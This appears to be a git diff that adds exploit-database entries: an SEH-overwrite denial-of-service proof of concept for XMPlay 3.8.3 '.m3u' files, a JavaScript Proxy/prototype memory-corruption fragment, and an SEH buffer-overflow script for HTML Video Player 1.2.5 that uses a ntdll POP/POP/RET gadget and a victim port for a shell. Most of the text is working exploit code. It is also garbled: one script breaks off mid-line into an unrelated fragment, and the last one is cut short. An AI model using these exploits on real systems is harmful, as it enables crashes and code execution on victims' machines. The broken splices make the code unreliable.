diff --git a/exploits/windows/dos/45887.py b/exploits/windows/dos/45887.py new file mode 100755 index 000000000..1e4b64e3b --- /dev/null +++ b/exploits/windows/dos/45887.py @@ -0,0 +1,44 @@ +# Exploit Title: XMPlay 3.8.3 - '.m3u' Denial of Service (PoC) +# Date: 2018-11-18 +# Exploit Author: s7acktrac3 +# Vendor Homepage: https://www.xmplay.com/ +# Software Link: https://support.xmplay.com/files_view.php?file_id=676 +# Version: 3.8.3 (latest) +# Tested on: Windows XP/7/8 +# CVE : N/A +# +# Lauch XMPlay and either drag xmplay.m3u into the XMPlay window or +# File Menu-> select winamp.m3u and Crash! +# -*- coding: utf-8 -*- +# +# Note: Successfully can overwrite the SEH chain & control the handler and nSEH +# but the address get mangled & unreconizable, for this reason could not turn into +# code execution. + +import struct +from struct import pack + +file_data = "#EXTM3U\n\r" +file_data += "#EXTINF:200,Sleep Away\n\r" +file_data += "http://test." + +max_size = 3000 - 1 +nseh_offset = 656 + +seh_overwrite = pack(" { + let buggy = [1]; + let arr = [1, 2]; + + arr.getPrototypeOf = Object.prototype.valueOf; + + buggy.__proto__ = new Proxy({}, arr); + + memset(buggy, -524286, 1); + trigger(arr, buggy); + + alert(arr); + }, 100); +} + +main(); \ No newline at end of file diff --git a/exploits/windows_x86/local/45888.py b/exploits/windows_x86/local/45888.py new file mode 100755 index 000000000..4f0148493 --- /dev/null +++ b/exploits/windows_x86/local/45888.py @@ -0,0 +1,79 @@ +# Exploit Title: HTML Video Player 1.2.5 - Buffer-Overflow (SEH) +# Author: Kağan Çapar +# Discovery Date: 2018-11-16 +# Software Link: http://www.html5videoplayer.net/html5videoplayer-setup.exe +# Vendor Homepage : http://www.html5videoplayer.net +# Tested Version: 1.2.5 +# Tested on OS: Windows XP SP3 *ENG +# Steps to Reproduce: Run the python exploit script, it will create a new +# file with the name "exploit.txt" and copy content to clipboard +# Open software, click Help > Register and paste "Username" click "OK" +# Finally, Connect victim machine on port your localport "1907" + +#!/usr/bin/python +import struct + +#SEH chain of main thread, item 0 +#Address=0012EAF4 +#SE handler=41414141 +#=> next_handler below! +#SEH chain of main thread, item 0 +#Address=0012EAF4 +#SE handler=336F4332 => + +#7C901931 5E POP ESI +#7C901932 5B POP EBX +#7C901933 C3 RETN + +#Executable modules, item 14 +#Base=7C900000 +#Size=000B2000 (729088.) +#Entry=7C912AFC ntdll. +#Name=ntdll (system) +#File version=5.1.2600.6055 (xpsp_sp3_qfe.101 +#Path=C:\WINDOWS\system32\ntdll.dll + +file = open("exploit.txt", "w") +buf = "\x43\x57\x44\x4F\x4E\x4B\x4E\x50\x48\x52\x4B\x45\x59\x41\x4b\x53" * 124 +buf+= "\xEB\x06\x90\x90" #6b jmp code +buf+= struct.pack('